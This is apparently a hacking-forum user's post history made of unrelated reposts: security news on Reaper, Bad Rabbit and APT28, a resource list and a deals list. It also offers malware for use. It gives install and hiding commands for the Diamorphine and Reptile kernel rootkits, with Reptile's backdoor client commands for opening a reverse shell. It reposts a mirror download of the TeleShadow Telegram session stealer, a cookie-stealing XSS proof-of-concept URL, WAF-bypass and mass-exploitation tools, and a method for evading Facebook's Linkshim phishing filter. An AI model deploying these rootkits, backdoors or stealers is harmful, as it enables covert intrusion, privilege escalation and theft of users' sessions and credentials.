Everything posted by Fi8sVrs
Phishruffus - Intelligent threat hunter and phishing servers

Phishruffus is a tool designed for the identification of DNS servers and Internet threats used for the illegal practice of phishing.
https://lab.insightsecurity.com.br/phishruffus-intelligent-threat-hunter-and-phishing-servers/

Usage: ./phishruffus.py --listdns dns_servers.txt --timeout 5
Example: https://asciinema.org/a/144460

Download: Phishruffus-master.zip
or: git clone https://github.com/jh00nbr/Phishruffus.git

Mirror: phishruffus.py, requirements.txt

requirements.txt:
dnspython==1.15.0
requests==2.18.4

Sources:
https://github.com/jh00nbr/Phishruffus
https://lab.insightsecurity.com.br/phishruffus-intelligent-threat-hunter-and-phishing-servers/
https://deals.thehackernews.com/free

- Free: 1-Month of Any SaneBox Subscription (list price $36)
- Free eBook: How To Build a Career in Tech
- Free: $10 Off Puls Phone Repair and TV Mounting
- Free: Learn to Code Course + Free Trial for Any GoGoTraining Course (list price $95)
- Free: 20% Off Coupon for Grammarly Premium (list price $29.95)
- Free: 30-Day Premium Membership to Shaw Academy (list price $49.95)
- Free: 20% Off Lensabl Lenses
- Free: 2 FREE Audiobooks and 30-Day Audible Trial Membership (list price $30)
- Free: TMAC Fitness: 1-Month Membership (list price $14.95)
- Free: Perfect Privacy VPN 30 Day Trial (list price $14.99)
- Free: HTML5 Game Development by Example (list price $200)
- Free Bottle of Wine From Wine Awesomeness with Membership (list price $15)
- Home Chef: $30 Off First Purchase
- Free: Robinhood Stock Trading + 1 Free Share of Stock (list price $65)
- Free: Ultimate Coding Bundle (list price $737)
- Free: Latigo Coffee 6oz Bag of Coffee (list price $10)
- Free: Watermark Software (list price $24.95)
- Free: Arcadia Power Clean Energy Membership
- Free: Byte-Sized-Chunks: CSS with HTML (list price $49)
- Free: Instagram iOS App: Photo Sharing on iOS
- Free: Chinese Made Easy: An Exciting Start to Chinese
- Free: Premium Coding Bundle (list price $120)
- Free: Byte-Sized-Chunks: Decision Trees and Random Forests (list price $69)
- Free: WishList Member & WordPress: Create a Membership Site (list price $49)
- Free: WordPress Freelancing 101 (list price $49)
- Free: Beachbody On-Demand Exclusive 30-Day Trial
- Free: All-About-Android Coding Bundle (list price $95)
- Free: 1-Month of Dashlane Premium (list price $39.99)
- Free: Mighty Mac App Bundle (list price $130.75)
- Free: Logo Design by PM Logos (list price $75)
- Free: 'The 4-Hour Chef' Audiobook (list price $20)
WordPress User Login History plugin version 1.5.2 suffers from a cross site scripting vulnerability.

Product: User Login History Wordpress Plugin - https://wordpress.org/plugins/user-login-history/
Vendor: Er Faiyaz Alam
Tested version: 1.5.2
CVE ID: CVE-2017-15867

** CVE description **
Multiple cross-site scripting (XSS) vulnerabilities in the user-login-history plugin through 1.5.2 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) date_from, (2) date_to, (3) user_id, (4) username, (5) country_name, (6) browser, (7) operating_system, or (8) ip_address parameter to admin/partials/listing/listing.php.

** Technical details **
The above-mentioned HTTP GET parameters are directly put into the value attribute of an HTML form field without proper sanitization. An attacker can close the HTML input tag with the "> (%22%3E) expression and inject arbitrary HTML/JavaScript code.

Example of the vulnerable code with the date_from parameter (line 21):

<td><input readonly="readonly" autocomplete="off" placeholder="<?php _e("From", "user-login-history") ?>" id="date_from" name="date_from" value="<?php echo isset($_GET['date_from']) ? $_GET['date_from'] : "" ?>" class="textfield-bg"></td>

** Proof of Concept **
Example using the user_id parameter:
http://<host>/wordpress/wp-admin/admin.php?page=user-login-history&user_id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

** Solution **
Update to version 1.6.

** Timeline **
15/10/2017: vendor contacted
15/10/2017: vendor acknowledgment
18/10/2017: fix pushed to GitHub
30/10/2017: fixed release available on WordPress Plugins Store.

** Credits **
Vulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI).
** References **
- WordPress-plugin-user-login-history GitHub: error log and xss and some minor improvements
https://github.com/faiyazalam/WordPress-plugin-user-login-history/commit/519341a7dece59e2c589b908a636e6cf12a61741

--
Best Regards,
Nicolas Buzy-Debat
Orange Cyberdefense Singapore (CERT-LEXSI)

# 0day.today [2017-11-01] #
Source: 0day.today
WAFNinja - Penetration testers favorite for WAF Bypassing

WAFNinja is a CLI tool written in Python. It shall help penetration testers to bypass a WAF by automating steps necessary for bypassing input validation. The tool was created with the objective to be easily extendible, simple to use and usable in a team environment. Many payloads and fuzzing strings, which are stored in a local database file, come shipped with the tool. WAFNinja supports HTTP connections, GET and POST requests and the use of Cookies in order to access pages restricted to authenticated users. Also, an intercepting proxy can be set up.

Usage: wafninja.py [-h] [-v] {fuzz, bypass, insert-fuzz, insert-bypass, set-db} ...

EXAMPLE:
fuzz: python wafninja.py fuzz -u "http://www.target.com/index.php?id=FUZZ" -c "phpsessid=value" -t xss -o output.html
bypass: python wafninja.py bypass -u "http://www.target.com/index.php" -p "Name=PAYLOAD&Submit=Submit" -c "phpsessid=value" -t xss -o output.html
insert-fuzz: python wafninja.py insert-fuzz -i select -e select -t sql

positional arguments:
{fuzz, bypass, insert-fuzz, insert-bypass, set-db} Which function do you want to use?
- fuzz: check which symbols and keywords are allowed by the WAF.
- bypass: sends payloads from the database to the target.
- insert-fuzz: add a fuzzing string
- insert-bypass: add a payload to the bypass list
- set-db: use another database file. Useful to share the same database with others.

optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit

I would appreciate any feedback! Cheers, Khalil.

Download: WAFNinja-master.zip or git clone https://github.com/khalilbijjou/WAFNinja.git
Source: https://github.com/khalilbijjou/WAFNinja
SQL-injection security hole needs patching ASAP

Updated WordPress has a security patch out for a programming blunder that you should apply ASAP. The fix addresses a flaw that can be potentially exploited by hackers to hijack and take over WordPress-powered websites, by injecting malicious SQL database commands.

The core installation of WordPress is not directly affected, we're told; rather, the bug is in a security function provided by the core to plugins and themes. In other words, a bug in the core leaves plugins and themes potentially at risk of being hacked, leading to whole sites being commandeered by miscreants. Also, crafting a patch to address the blunder without breaking tons of add-ons for WordPress turned out to be problematic, delaying the release of

"WordPress versions 4.8.2 and earlier are affected by an issue where $wpdb->prepare() can create unexpected and unsafe queries leading to potential SQL injection (SQLi)," the official advisory today warned. "WordPress core is not directly vulnerable to this issue, but we’ve added hardening to prevent plugins and themes from accidentally causing a vulnerability."

According to the flaw's finder, Anthony Ferrara, VP of engineering at Lingo Live, WordPress 4.8.2 was released last month in an attempt to shore up its $wpdb->prepare() code, but that update was shoddy. As well as not fully addressing the underlying flaw, the update also broke "a metric ton of third-party code and sites – an estimated 1.2 million lines of code affected," Ferrara said.

Ferrara immediately warned the WordPress team that the 4.8.2 patch was insufficient and liable to break add-ons for the software; we're told the project initially refused to take him seriously. It only backed down – and prepared a better fix that doesn't break everything, aka version 4.8.3 – when he provided proof-of-concept exploit code for the lingering hole, and threatened to go public, all according to Ferrara.

"One of our struggles here, as it often is in security, is how to secure things while also breaking as little as possible," Ferrara quoted the WordPress team as saying.

While the veep acknowledged that many of the people working on WordPress are volunteers, he expressed frustration at the group's attitude towards security. However, he remains hopeful that the project will get better at responding faster to reports of exploitable holes in the codebase.

"It took literally five weeks to even get someone to consider the actual vulnerability," Ferrara said. "From there, it took me publicly threatening full disclosure to get the team to acknowledge the full scope of the issue, though they did start to engage deeper prior to the full disclosure threat. I was disappointed for a good part of the past six weeks. I’m now cautiously hopeful."

You can find more technical details on the vulnerability here. In any case, make sure you install or upgrade to version 4.8.3 on your websites to avoid being hacked via your plugins and themes. ®

Updated to add: Ferrara has been in touch to say he disputes that the WordPress core is not directly affected, as the open-source project described. The core contains the buggy code, he insists.

"I disagree that core was not vulnerable," he told us. "The original proof-of-concept I shared with them was against core. Two queries in core are exploitable, though they require editor privileges."

As we understand it, the WordPress core SQL string escape code was flawed, but was accessible to site visitors only via plugins and tools. Ferrara reckons logged-in editors could also access the vulnerable functionality. In any case, just patch and move on.

Via theregister.co.uk
Diamorphine - LKM rootkit for Linux Kernels 2.6.x/3.x/4.x
Fi8sVrs posted a topic in Programe hacking
Diamorphine is a LKM rootkit for Linux Kernels 2.6.x/3.x/4.x

Features
- When loaded, the module starts invisible;
- Hide/unhide any process by sending a signal 31;
- Sending a signal 63 (to any pid) makes the module become (in)visible;
- Sending a signal 64 (to any pid) makes the given user become root;
- Files or directories starting with the MAGIC_PREFIX become invisible;

Source: https://github.com/m0nad/Diamorphine

Install
Verify if the kernel is 2.6.x/3.x/4.x: uname -r
Clone the repository: git clone https://github.com/m0nad/Diamorphine
Enter the folder: cd Diamorphine
Compile: make
Load the module (as root): insmod diamorphine.ko

Uninstall
The module starts invisible; to remove it you need to make it visible: kill -63 0
Then remove the module (as root): rmmod diamorphine

References
- Wikipedia Rootkit https://en.wikipedia.org/wiki/Rootkit
- Linux Device Drivers http://lwn.net/Kernel/LDD3/
- LKM HACKING https://www.thc.org/papers/LKM_HACKING.html
- Memset's blog http://memset.wordpress.com/
- Linux on-the-fly kernel patching without LKM http://phrack.org/issues/58/7.html
- WRITING A SIMPLE ROOTKIT FOR LINUX http://big-daddy.fr/repository/Documentation/Hacking/Security/Malware/Rootkits/writing-rootkit.txt
- Linux Cross Reference http://lxr.free-electrons.com/

Mirror:
- Makefile - pushing the code
- diamorphine.c - 'sys_call_table' symbol conflicts with a previous declaration
- diamorphine.h - remove useless code/comment

Source: https://github.com/m0nad/Diamorphine
TeleShadow - First Telegram Desktop Session Stealer [ Windows ]
Fi8sVrs replied to Fi8sVrs's topic in Programe hacking
@razzy4realbiz Telegram reported this tool to have it blocked from GitHub; here is a mirror.
Files / Download: https://www.sendspace.com/file/wdww7x
ATSCAN SCANNER - Advanced Search / Dork / Mass Exploitation Scanner

[!] LEGAL DISCLAIMER: Alisam Technology is not responsible for any misuse, damage caused by this script or attacking targets without prior mutual consent! It is your responsibility to obey laws!

Tool: ATSCAN V 12.4.4
Codename: 4n0n4t
AUTHOR: Ali MEHDIOUI
GROUP: Alisam Technology
FACE: facebook.com/Alisam.Technology
YOUTUBE: youtube.com/c/AlisamTechnology
TWITTER: twitter.com/AlisamTechno
PLUS: plus.google.com/+AlisamTechnology

★ Description:
● Search engine Google / Bing / Ask / Yandex / Sogou
● Mass Dork Search
● Multiple instant scans.
● Mass Exploitation
● Use proxy.
● Random user agent.
● Random engine.
● Extern commands execution.
● XSS / SQLI / LFI / AFD scanner.
● Filter wordpress and Joomla sites.
● Find Admin page.
● Decode / Encode Base64 / MD5
● Ports scan.
● Collect IPs
● Collect E-mails.
● Auto detect errors.
● Auto detect Cms.
● Post data.
● Auto sequence repeater.
● Validation.
● Post and Get method
● Interactive and Normal interface.
● And more...

★ Libraries to install: Perl required. Works on all platforms. Available in Blackarch Linux and Dracos systems.

★ Download:
● git clone https://github.com/AlisamTechnology/ATSCAN
● direct link: https://github.com/AlisamTechnology/ATSCAN

★ Permissions:
cd ATSCAN
chmod +x ./atscan.pl

★ Installation:
chmod +x ./install.sh
./install.sh

★ Execution:
Portable Execution: perl ./atscan.pl
Installed Tool Execution: atscan
Menu: Applications > Web Application analysis > atscan

★ Uninstall Tool: atscan --uninstall

Source: https://github.com/AlisamTechnology/ATSCAN
Awesome Hacking Resources

A collection of hacking / penetration testing resources to make you better! Let's make it the biggest resource repository for our community. You are welcome to fork and contribute. We started a new tools list, come and contribute.

Table of Contents
- Learning the Skills
- YouTube Channels
- Companies
- Conferences
- NEWS
- Sharpening Your Skills
- Reverse Engineering, Buffer Overflow and Exploit Development
- Privilege Escalation
- Network Scanning / Reconnaissance
- Malware Analysis
- Vulnerable Web Application
- Vulnerable OS
- Exploits
- Forums
- Archived Security Conference Videos
- Online Communities
- Online News Sources
- Linux Penetration Testing OS

Learning the Skills
- Free interactive labs with White Hat Academy
- Learning Exploitation with Offensive Computer Security 2.0
- Cybrary
- OffensiveComputerSecurity
- CS 642: Intro to Computer Security
- Free cyber security training
- SecurityTube
- Seed Labs
- Hak5
- OWASP top 10 web security risks
- MIT OCW 6.858 Computer Systems Security

YouTube Channels
- OWASP
- Hak5
- BlackHat
- Christiaan008

Companies
- 0patch by ACROS Security
- Detectify
- Kaspersky Lab
- Metasploit
- OpenNSM
- Rapid7
- Securelist
- Segment Security
- SocialEngineerOrg
- Sonatype
- SophosLabs
- Sourcefire
- Station X
- Synack
- TippingPoint Zero Day Initiative
- Tripwire, Inc.
- Vincent Yiu
- nVisium
- ntop

Conferences
- 44contv
- BruCON Security Conference
- BSides Manchester
- BSidesAugusta
- CarolinaCon
- Cort Johnson
- DevSecCon
- Garage4Hackers - Information Security
- HACKADAY
- Hack In The Box Security Conference
- Hack in Paris
- Hacklu
- Hacktivity
- Hardwear.io
- IEEE Symposium on Security and Privacy
- LASCON
- Marcus Niemietz
- Media.ccc.de
- NorthSec
- Pancake Nopcode
- Psiinon
- SJSU Infosec
- Secappdev.org
- Security Fest
- SecurityTubeCons
- ToorCon
- USENIX Enigma Conference

NEWS
- Corey Nachreiner
- Error 404 Cyber News
- Latest Hacking News
- Pentester Academy TV
- SecureNinjaTV
- Troy Hunt
- Samy Kamkar's Applied Hacking
- danooct1
- DedSec
- DEFCON Conference
- DemmSec
- Don Does 30
- Geeks Fort - KIF
- iExplo1t
- HACKING TUTORIALS
- LiveOverflow
- Metasploitation
- NetSecNow
- Open SecurityTraining
- BalCCon - Balkan Computer Congress
- Penetration Testing in Linux
- rwbnetsec
- Security Weekly
- Seytonic
- Shozab Haxor
- SSTec Tutorials
- Waleed Jutt
- webpwnized
- JackkTutorials
- Zer0Mem0ry
- LionSec
- Adrian Crenshaw
- HackerSploit
- Derek Rook - CTF/Boot2root/wargames Walkthrough

Sharpening Your Skills
- OWASP Security Shepherd
- CTFLearn
- CTFs write-ups
- CTF365
- Pentestit
- Hacksplaining
- The cryptopals crypto challenges
- The enigma group
- Ringzer0 Team
- Hack The Box
- Over the wire
- Backdoor
- Vulnhub
- Hack.me
- Hack this site!
- Exploit exercises
- PentesterLab
- SmashTheStack
- Root-Me
- PicoCTF
- Shellter Labs
- Pentest Practice
- Pentest.training
- pwnable.kr
- pwnable.tw
- hackburger.ee
- http://noe.systems/
- Hacker Gateway
- Solve Me
- Challenge Land
- Participating Challenge Sites
- Hacker test
- Crackmes.de Archive (2011-2015)
- ROP Emporium
- Google's XSS game

Reverse Engineering, Buffer Overflow and Exploit Development
- Shell storm
- Buffer Overflow Exploitation Megaprimer for Linux
- Reverse Engineering Malware 101
- Reverse Engineering Malware 102
- Modern Binary Exploitation - CSCI 4968
- Introductory Intel x86
- Binary hacking
- Shellcode Injection
- Reverse Engineering for Beginners
- Exploit tutorials
- Exploit development
- Corelan tutorials
- Reverse engineering reading list
- Reverse Engineering challenges
- Reverse Engineering for beginners (GitHub project)
- reversing.kr challenges
- Analysis and exploitation (unprivileged)
- A Course on Intermediate Level Linux Exploitation
- Lena's Reversing for Newbies (Complete)
- Megabeets journey into Radare2
- Introduction to ARM Assembly Basics (https://azeria-labs.com/writing-arm-assembly-part-1/)
- Linux (x86) Exploit Development Series

Privilege Escalation
- Reach the root
- Basic linux privilege escalation
- Windows Privilege Escalation
- Privilege escalation for Windows and Linux
- Windows Privilege Escalation Fundamentals
- RootHelper
- Windows exploits, mostly precompiled.
- Unix privesc checker
- Privilege escalation linux with live example
- Windows privilege escalation checker
- Linux Privilege Escalation Scripts
- AutoLocalPrivilegeEscalation
- Linux Privilege Escalation Check Script
- Local Linux Enumeration & Privilege Escalation Cheatsheet
- 4 Ways get linux privilege escalation

Malware Analysis
- Malware traffic analysis
- Malware Analysis - CSCI 4976

Network Scanning / Reconnaissance
- Foot Printing with WhoIS/DNS records
- Google Dorks/Google Hacking

Vulnerable Web Application
- OWASP Hackademic Challenges project
- bWAPP
- Damn Vulnerable Web Application (DVWA)
- Xtreme Vulnerable Web Application (XVWA)
- WebGoat: A deliberately insecure Web Application
- OWASP Mutillidae II
- OWASP Broken Web Applications Project
- Damn Small Vulnerable Web
- OWASP Juice Shop
- Google Gruyere

Vulnerable OS
- Metasploitable2 (Linux)
- Metasploitable3 [Installation]
- Vulnhub
- General Test Environment Guidance

Linux Penetration Testing OS
- BackBox
- BlackArch
- Kali
- LionSec Linux
- Parrot
- Bugtraq

Exploits
- Exploit Database
- CXsecurity
- 0day.today
- Snyk Vulnerability DB

Forums
- Greysec
- Hackforums
- 0x00sec
- Antichat
- EAST Exploit database

Archived Security Conference Videos
- InfoCon.org
- Irongeek

Online Communities
- Hack+
- MPGH
- Hacktoday

Online News Sources
- Recent Hash Leaks
- InfoSec
- Threatpost
- Security Intell
- The Hacker News

Source: https://github.com/vitalysim/Awesome-Hacking-Resources
About 50% of sites on the web are powered by Content Management Systems, and that trend is growing. Integrating Progressive Technologies into the workflow of platforms such as WordPress and other CMSes is of paramount importance for ensuring that users get an awesome experience in these environments. Surma and Dan Walmsley discuss the challenges involved in the integration of progressive technologies with CMSes in general and WordPress in particular, and present a working proof of concept of how such an integration would work in the context of WordPress.

Check out the code here: https://github.com/GoogleChromeLabs/progressivewordpress
Check out the rest of the Chrome Dev Summit videos here: https://goo.gl/ekCoVu
Subscribe to the Google Chrome Developers channel: http://goo.gl/LLLNvf
Author: Barak Tawily

While we are on Facebook, we often share links to external sources, like Youtube, Google Drive, Instagram, or any other websites. Many people think that Facebook links are quite reliable, but are they? Facebook users can send those links via post or privately over Messenger, as you can see on the following images:

So how exactly does the preview link feature work? When a user is about to post a link, he pastes it on Facebook, which detects it as a URL; then a Facebook bot called “Facebook External Hit” sends a GET request to the supplied link and extracts the relevant data from the HTML content, such as preview image, title, description, and origin domain. The link’s preview data is the only information supplied to the user before clicking it. In case the preview data is fake, it is super useful for phishing campaigns/ads/click fraud (pay-per-click)/Malvertising; just a few days ago, I read this article about gigantic ad fraud on MySpace.

So after exploring this feature, I managed to understand how exactly the preview data was fetched, and what the Facebook bot is looking for in the HTML content. Facebook’s bot is looking for specific HTML tags; some of the tags it is looking for are the “meta” tags, specifically with values “og:url”, “og:image” and “og:title” in the “property” attribute. Due to the lack of validation between the “og:url” content attribute and the origin domain that returned the HTML, it is possible to abuse this feature via crafted meta tags, so in case someone supplies to the Facebook bot a URL that returns HTML with those crafted tags which contain fake data of another website (let’s say Youtube), the preview data will look like a Youtube song (or any other targeted page over the internet), but the actual link will lead victims to the URL containing the malicious HTML.

An example of HTML that fakes a Youtube song link:

In my opinion, all Facebook users think that preview data shown by Facebook is reliable, and will click the links they are interested in, which makes them easily targeted by attackers that abuse this feature in order to perform several types of attacks as I mentioned above (phishing campaigns/ads/click fraud pay-per-click).

I reported this issue to Facebook but unfortunately they refused to recognize it as a security issue and replied:

In addition, Facebook replied that the links posted are validated via a system called “Linkshim”, in order to avoid phishing and malicious websites, but faking the meta tags is not considered malicious activity. I explored how Linkshim works, which is probably part of the “Facebook External Hit” bot. I tried to publish a link that redirects the user’s browser to “evilzone” but it was detected and removed (as shown in the PoC video); then I thought, what if I supply the Facebook bot just a normal fake HTML without any malicious code, but supply victims the malicious HTML?

PoC video:

The following code bypasses the Linkshim system by detecting the bot request via User Agent (you can do so via detecting IP) and supplies HTML with non-malicious content while supplying the malicious HTML to victims: https://pastebin.com/kwc3MJuv
mirror:

In this article I did not show a real-life attack scenario and didn't abuse this feature for real malicious activity, but there are plenty of ways to exploit this vulnerability in order to perform several types of attacks like stealing sensitive information like credentials/credit cards. In summary, I hope this post will make Facebook users aware of this issue and make Facebook address those vulnerabilities.

Source: https://baraktawily.blogspot.nl/2017/10/can-you-trust-facebook-links.html
Hashcat is an advanced GPU hash cracking utility that includes the World's fastest md5crypt, phpass, mscash2 and WPA / WPA2 cracker. It also has the first and only GPGPU-based rule engine, focuses on highly iterated modern hashes, single dictionary-based attacks, and more. This is the source code release.

Changes:
- Added support to crack passwords and salts up to length 256.
- Added option --optimized-kernel-enable to use faster kernels but limit the maximum supported password- and salt-length.
- Added self-test functionality to detect broken OpenCL runtimes on startup.
- Various other additions.

Download: hashcat-4.0.0.tar.gz (3.7 MB)
Source
Reptile

Reptile is a LKM rootkit for evil purposes. If you are searching stuff only for study purposes, see the demonstration codes.

Features
- Give root to unprivileged users
- Hide files and directories
- Hide files contents
- Hide processes
- Hide itself
- Boot persistence
- Heaven's door - A ICMP/UDP port-knocking backdoor
- Client to knock on heaven's door

Install
apt-get install linux-headers-$(uname -r)
git clone https://github.com/f0rb1dd3n/Reptile.git
cd Reptile
./installer.sh install

Usage
Binaries will be copied to the /reptile folder, which will be hidden by Reptile.

Getting root privileges:
hax@Debian:~$ id
uid=1000(hax) gid=1000(hax) grupos=1000(hax),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth),118(scanner)
hax@Debian:~$ /reptile/r00t
You got super powers!
root@Debian:/home/hax# id
uid=0(root) gid=0(root) groups=0(root)

Hiding
Hide/unhide reptile module: kill -50 0
Hide/unhide process: kill -49 <PID>
Hide files contents: all content between the tags will be hidden. Example:
#<reptile>
content to hide
#</reptile>

Knocking on heaven's door
Heaven's door is a ICMP/UDP port-knocking backdoor used by Reptile. To access the backdoor you can use the client:

Knock Knock on Heaven's Door
Written by: F0rb1dd3n
Usage: ./knock_on_heaven <args>
-x protocol (ICMP/UDP)
-s Source IP address (You can spoof)
-t Target IP address
-p Source Port
-q Target Port
-d Data to knock on backdoor: "<key> <reverse IP> <reverse Port>"
-l Launch listener
[!] ICMP doesn't need ports
ICMP: ./knock_on_heaven -x icmp -s 192.168.0.2 -t 192.168.0.3 -d "F0rb1dd3n 192.168.0.4 4444" -l
UDP: ./knock_on_heaven -x udp -s 192.168.0.2 -t 192.168.0.3 -p 53 -q 53 -d "F0rb1dd3n 192.168.0.4 4444" -l

Disclaimer
Some functions of this module are based on other rootkits. Please see the references!

References
- “LKM HACKING”, The Hackers Choice (THC), 1999;
- https://github.com/m0nad/Diamorphine.git
- https://github.com/David-Reguera-Garcia-Dreg/enyelkm.git
- https://github.com/maK-/maK_it-Linux-Rootkit
- “Abuse of the Linux Kernel for Fun and Profit”, Halflife, Phrack 50, 1997;
- https://ruinedsec.wordpress.com/2013/04/04/modifying-system-calls-dispatching-linux/

Contributing
I am open to receiving contributions. If you can contribute to this project, discuss the contribution via e-mail or open an issue, fork the project and make a pull request. I will evaluate pull requests and merge them into the project.

Download: Reptile-master.zip or git clone https://github.com/f0rb1dd3n/Reptile.git
Source: https://github.com/f0rb1dd3n/Reptile
Zatarra, I think he is referring to smsglobal.com, which 4 or 5 years ago had a trial version, limited to 150-200 free SMS messages, with whatever options you want: sender ID, mass send, API etc. Now it's paid and they are serious, they work with big companies, Microsoft, IBM etc.

P.S. Post something useful on the forum in return for this information, and don't try to run scams with them; that's why they removed the trial.
Reaper is on track to become one of the largest botnets recorded in recent years — and yet nobody seems to know what it will do or when. But researchers say the damage could be bigger than last year's cyberattack.

A little over a month ago, a sizable botnet of infected Internet of Things devices began appearing on the radar of security researchers. Now, just weeks later, it's on track to become one of the largest botnets recorded in recent years.

The botnet, dubbed "Reaper" by researchers at Netlab 360, is said to have ensnared almost two million internet-connected webcams, security cameras, and digital video recorders (DVRs) in the past month, says Check Point, which also published research, putting its growth at a far faster pace than Mirai.

It was Mirai that caused a massive distributed denial-of-service (DDoS) attack last October, knocking popular websites off the internet for millions of users. The collective bandwidth from the huge number of "zombie devices" that were infected and enslaved was directed at Dyn, an internet infrastructure company, which overloaded the company's systems and prevented millions from accessing popular websites.

Mirai was "beautifully simple," said Ken Munro, a consultant at UK-based security firm Pen Test Partners. The malware would scan the internet and infect connected devices with default usernames and passwords, which either weren't or couldn't be changed by the owner.

Reaper, however, "is what Mirai could easily have been," said Munro. It takes a slightly different, more advanced approach by quietly targeting and exploiting known vulnerabilities in devices and injecting its malicious code, effectively hijacking the device for whenever the botnet controller is ready to issue their commands. Each time a device is infected, the device spreads the malware to other vulnerable devices -- like a worm. Mirai aggressively ran each device against a list of known usernames and passwords, but Reaper is "not very aggressive," said Netlab.

By targeting a known vulnerability, the botnet can swiftly take control of a device without raising any alarms. Netlab said at the time of publishing their research that the botnet was infecting nine known vulnerabilities in D-Link, Netgear, and AVTech products, as well as other device makers.

Not only has the botnet gained in size in the past month -- it's growing in capability. New exploits have been added to the botnet's arsenal regularly in recent days, said Netlab. Check Point said 33 devices are vulnerable to attack so far. Researchers have also noted that several known, easy-to-exploit vulnerabilities have not been added to the botnet, raising questions about why some exploits have been added and not others.

But what's thrown researchers is that nobody can figure out what the botnet is for. While the Mirai botnet was a point-and-shoot botnet that could be used to hose systems with vast amounts of bandwidth, Reaper can be used to run complex attack scripts on infected devices. Reaper's command and control infrastructure is also growing in size, accommodating more infected devices by the day. Netlab said 10,000 bots were under the wing of just one command and control server.

So far, there haven't been any signs of DDoS attacks yet. The botnet creator ("it appears that one group or individual has control of most of it," said Munro) is focusing on building the botnet's size. As it stands, Reaper's size today could be capable of "creating significantly more DDoS traffic than Mirai," said Munro.

It's not the first time botnets of a massive scale have crept up on security researchers. Earlier this year, a 300,000-strong botnet appeared almost out of nowhere, but researchers couldn't figure out what it did -- if anything.

A breakdown of the Reaper botnet shows that the malware that infects devices allows the botnet owner to remotely execute code on each device, said Alan Woodward, a professor at the University of Surrey. But because each device has such little individual computational power, the code running on each device would have to be harnessed collectively for a larger, coordinated computing task, he said. That could be anything from a DDoS on an internet target, to a much larger kind of attack.

What happens next is anybody's guess. There isn't much that consumers or device owners can do, except patch any affected devices they may own and carry out a factory reset. Given that device owners are at the mercy of the manufacturers to release patches -- many of which haven't learned much from the Mirai attack and still don't take security seriously -- many may find that simply pulling the plug on each and every affected device might be the only way to dismantle the botnet.

With enough amassed firepower to be larger and stronger than Mirai, the question isn't necessarily what the botnet will do.

Source: zdnet.com
- 1 reply
- 4
A new widespread ransomware attack is spreading like wildfire around Europe and has already affected over 200 major organisations, primarily in Russia, Ukraine, Turkey and Germany, in the past few hours.

Dubbed "Bad Rabbit," it is reportedly a new Petya-like targeted ransomware attack against corporate networks, demanding 0.05 bitcoin (~ $285) as ransom from victims to unlock their systems.

According to an initial analysis provided by Kaspersky, the ransomware was distributed via drive-by download attacks, using a fake Adobe Flash Player installer to lure victims into installing the malware unwittingly.

However, security researchers at ESET have detected the Bad Rabbit malware as 'Win32/Diskcoder.D' — a new variant of Petya ransomware, also known as Petrwrap, NotPetya, exPetr and GoldenEye.

Bad Rabbit ransomware uses DiskCryptor, an open source full drive encryption software, to encrypt files on infected computers with RSA 2048 keys.

ESET believes the new wave of ransomware attacks is not using the EternalBlue exploit — the leaked SMB vulnerability which was used by WannaCry and Petya ransomware to spread through networks. Instead, it first scans the internal network for open SMB shares, tries a hardcoded list of commonly used credentials to drop the malware, and also uses the Mimikatz post-exploitation tool to extract credentials from the affected systems.

The ransom note, shown above, asks victims to log into a Tor onion website to make the payment, which displays a countdown of 40 hours before the price of decryption goes up.

The affected organisations include Russian news agencies Interfax and Fontanka, payment systems on the Kiev Metro, Odessa International Airport and the Ministry of Infrastructure of Ukraine.

Researchers are still analyzing the Bad Rabbit ransomware to check if there is a way to decrypt computers without paying the ransom and how to stop it from spreading further.

How to Protect Yourself from Ransomware Attacks?

Kaspersky suggests disabling the WMI service to prevent the malware from spreading over your network.

Most ransomware spreads through phishing emails, malicious adverts on websites, and third-party apps and programs. So, you should always exercise caution when opening uninvited documents sent over email and clicking on links inside those documents, unless you have verified the source, to safeguard against such ransomware infections.

Also, never download any app from third-party sources, and read reviews even before installing apps from official stores.

To always have a tight grip on your valuable data, keep a good backup routine in place that copies it to an external storage device that isn't always connected to your PC.

Make sure that you run a good and effective anti-virus security suite on your system, and keep it up-to-date.

Via thehackernews.com
- 2
Tagged with:
- win32/diskcoder.d
- bad rabbit
(and 1 more)
The APT28 threat group is moving fast in the hope that targets haven't yet installed a recently released patch to fix the recently uncovered exploit. State-backed hackers are looking to use the exploit before organisations have patched against it.

Hackers are rushing to exploit a zero-day Flash vulnerability to plant surveillance software before organisations have time to update their systems to patch the weakness.

Uncovered by researchers at Kaspersky Lab on Monday, the CVE-2017-11292 Adobe Flash vulnerability allows attackers to deploy an exploit which can lead to code execution on Windows, Mac, Linux, and Chrome OS systems. The exploit enables the delivery of malicious Word documents bundled with malware, for example to allow attackers to snoop on communications, eavesdrop on video messages and calls, and steal files.

Adobe Flash Player Desktop Runtime, Adobe Flash Player for Google Chrome, Adobe Flash Player for Microsoft Edge, and Internet Explorer 11 are all affected by the vulnerability, and organisations are urgently told to install the critical update.

As a result, attackers are moving quickly to exploit it while they can, and researchers at Proofpoint have attributed a campaign designed to spread trojan malware using the vulnerability to APT28 - also known as Fancy Bear - a Russian hacking group with links to the Kremlin.

The campaign to exploit the Flash vulnerability has been sent to government offices in Europe and the US specialising in foreign relations - researchers liken them to "entities equivalent to the State Department" - as well as private businesses in the aerospace industry. The widespread nature of the campaign - compared with other APT28 attacks - is likely an attempt by the attackers to get as much as they can from exploiting the Flash vulnerability before organisations get around to patching it.

In this instance, the malicious payload is delivered in a Word document titled "World War 3.docx" which contains text lifted from an article by a UK newspaper on North Korea, first published on Tuesday.

[Image: The Fancy Bear decoy document used in the campaign.]

Within the document is 'DealersChoice', an attack framework previously attributed to Russian hackers, which has now been bundled with the Flash vulnerability, in a similar way to the group's previous campaigns. Once installed on the system, the malware can be used as an effective espionage tool.

Researchers found that the exploitation was effective on systems using Windows 7 with Flash 27.0.0.159 and Microsoft Office 2013, and Windows 10 build 1607 with Flash 27.0.0.130 and Microsoft Office 2013. Unlike the previously uncovered campaign exploiting the vulnerability, Mac OS doesn't seem to be targeted in these attacks. It's therefore critical that the patches are applied in order to protect against these attacks.

"APT28 appears to be moving rapidly to exploit this newly documented vulnerability before the available patch is widely deployed," said researchers. "Because Flash is still present on a high percentage of systems and this vulnerability affects all major operating systems, it is critical that organizations and end users apply the Adobe patch immediately."

